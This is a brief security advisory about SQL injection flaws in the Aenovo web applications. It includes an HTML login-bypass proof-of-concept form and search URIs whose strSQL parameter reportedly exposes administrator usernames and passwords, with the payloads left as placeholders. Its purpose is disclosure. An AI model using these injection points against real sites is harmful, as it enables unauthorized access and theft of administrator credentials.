|
|
Aenovo Multiple SQL Injection Vulnerabilities
No exploit is required. An HTML proof of concept is available: <html> <h1>Aenovo Login-Bypass PoC - Kapda `s advisory </h1> <p> Discovery and exploit by farhadkey [at} kapda.ir</p> <p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p> <form method="POST" action="http://www.example.com/user/control.asp"> <input type="hidden" name="password" value="[SQL Injection]" > <input type="submit" value="Submit" name="B1"> <input type="hidden" name="test" value="1"> </form></html> Other proof of concept URI are also available: AeNovo :Lists username and password of administrators http://www.example.com/search.asp?strSQL=[SQL Injection] AeNovoShop:Lists username and password of administrators http://www.example.com/search.asp?strSQL=[SQL Injection] AeNovoWYSI:Lists username and password of administrators http://www.example.com/search.asp?strSQL=[SQL Injection] |
|
Privacy Statement |